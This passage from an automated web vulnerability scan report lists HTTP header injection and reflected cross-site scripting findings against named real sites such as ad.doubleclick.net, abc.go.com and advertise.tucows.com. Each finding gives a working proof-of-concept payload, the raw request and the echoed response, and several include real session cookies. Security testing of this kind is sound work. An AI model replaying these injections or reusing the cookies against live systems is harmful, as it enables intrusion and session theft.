User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/333cd
3e381d53e01
/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http: //ad.trafficmp.com/a/click
Date: Fri, 04 Feb 2011 17:55:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 87fe3%0d%0a9a9fc1f6091 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /87fe3%0d%0a9a9fc1f6091/N553.158901.DATAXU/B4970757.4;sz=728x90;pc=[TPAS_ID];ord=628759578? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0054251952045395&output=html&h=90&slotname=7506363877&w=728&lmt=1296848235&flash=10.1.103&url=http%3A%2F%2Fwww.exploit-db.com%2Fvbseo-from-xss-to-reverse-php-shell%2F&dt=1296826635258&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7506363877&correlator=1296826635225&frm=0&adk=774897698&ga_vid=2124507869.1296826622&ga_sid=1296826622&ga_hid=277931053&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1017&bih=953&eid=30143102&fu=0&ifi=2&dtd=29&xpc=2r8iU0N2xu&p=http%3A//www.exploit-db.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/87fe3
9a9fc1f6091
/N553.158901.DATAXU/B4970757.4%3Bsz%3D728x90%3Bpc%3D%5BTPAS_ID%5D%3Bord%3D628759578:
Date: Fri, 04 Feb 2011 17:55:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adi/lb.buzzillions/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/lb.buzzillions/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9db3a%0d%0aa4d4062d9d8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9db3a%0d%0aa4d4062d9d8/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9db3a
a4d4062d9d8
/lb.buzzillions/%3Bnet%3Dlb%3Bu%3D%2Clb-5843489_1296770394%2C11d765b6a10b1b3%2Cnone%2Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%3B%3Bpos%3Datf%3Btile%3D1%3Bdcopt%3Dist%3Bsz%3D728x90%3Bcontx%3Dnone%3Bdc%3Dw%3Bbtg%3Dan.:
Date: Fri, 04 Feb 2011 01:50:01 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.9. http://www.supermedia.com/spportal/spportalFlow.do [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload cdbde%0d%0ad36a9dd2cc was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /spportal/spportalFlow.docdbde%0d%0ad36a9dd2cc?_flowExecutionKey=_c086BB48A-27A9-FE95-CA40-0000B767F5C1_kD178CD9B-A35A-5925-4EF5-B8443B54EAB4 HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.supermedia.com/support/contact-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762103|check#true#1296760303; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Server: Unspecified
Date: Thu, 03 Feb 2011 19:19:10 GMT
Location: https://www.supermedia.com/spportal/spportalFlow.docdbde
d36a9dd2cc
?_flowExecutionKey=_c086BB48A-27A9-FE95-CA40-0000B767F5C1_kD178CD9B-A35A-5925-4EF5-B8443B54EAB4
Content-Length: 0
Connection: close


3. Cross-site scripting (reflected)  previous  next
There are 493 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://abc.go.com/vp2/d/deeplink [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /vp2/d/deeplink

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload bf5ec--><script>alert(1)</script>db1ccd44039 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /vp2/d/deeplinkbf5ec--><script>alert(1)</script>db1ccd44039 HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
Content-Length: 4911
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error - 404 </title>
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 6.0.3.7 ~~~ Brandid: 001 ~~~ /vp2/d/deeplinkbf5ec--><script>alert(1)</script>db1ccd44039?brandid=001 -->
...[SNIP]...

3.2. http://ads.adap.tv/beacons [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b6987<script>alert(1)</script>1178017b98e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacons?callback=jsonp1296766389465b6987<script>alert(1)</script>1178017b98e HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+13%3A39%3A06";Path=/;Domain=.adap.tv;Expires=Sun, 12-Oct-42 23:25:46 GMT
Content-Type: text/plain; charset=iso-8859-1
Server: Jetty(6.1.22)
Content-Length: 170

jsonp1296766389465b6987<script>alert(1)</script>1178017b98e({
   "beacons":["http://tags.bluekai.com/site/2174", "http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif"]
})

3.3. http://ads.gmodules.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.gmodules.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 6f421%0aalert(1)//3a48dc45b10 was submitted in the url parameter. This input was echoed as 6f421
alert(1)//3a48dc45b10
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?synd=ads&url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayakhotel%2F728x90.xml6f421%0aalert(1)//3a48dc45b10&lang=en&country=US&up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26num%3D1%26ggladgrp%3D9764709784055921816%26gglcreat%3D9143352621951917205%26sig%3DAGiWqtwyJ0z2eP12NfR0KoaagOUkxWNa_A%26client%3Dca-pub-3033999741136561%26adurl%3D&up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26sigh%3DG7T3ZBT9Zc4%26label%3D_AITNAME_%26value%3D_AITVALUE_&up_ads_clicktarget_new_=0&up_rawquery=chicago%20hotels&up_city=Crystal&up_region=US-MI&up_lat=43.26&up_long=-84.91 HTTP/1.1
Host: ads.gmodules.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=2791779905&w=728&lmt=1296808620&flash=10.1.103&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787020952&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529%2C2067036752&correlator=1296787019866&frm=0&adk=1244530545&ga_vid=371918977.1296786866&ga_sid=1296786866&ga_hid=969342198&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1033&bih=1012&fu=0&ifi=3&dtd=11&xpc=WZvbsEpZ0D&p=http%3A//www.bizfind.us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Fri, 04 Feb 2011 17:55:01 GMT
Expires: Fri, 04 Feb 2011 17:55:01 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 132

Unable to retrieve spec for http://www.ljmsite.com/google/gadgetads/kayakhotel/728x90.xml6f421
alert(1)//3a48dc45b10
. HTTP error 400

3.4. http://advertise.tucows.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f20"-alert(1)-"c17f4a73141 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?41f20"-alert(1)-"c17f4a73141=1 HTTP/1.1
Host: advertise.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:33 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/?41f20"-alert(1)-"c17f4a73141=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.5. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25a76"-alert(1)-"4bef7d4836e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes25a76"-alert(1)-"4bef7d4836e/corpbar/cb3.0/css/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:21 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes25a76"-alert(1)-"4bef7d4836e/corpbar/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.6. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9378"-alert(1)-"68cf811d6fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbarb9378"-alert(1)-"68cf811d6fc/cb3.0/css/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:27 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/corpbarb9378"-alert(1)-"68cf811d6fc/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.7. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1d63"-alert(1)-"f61e34bb76a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.0f1d63"-alert(1)-"f61e34bb76a/css/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:45 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32415

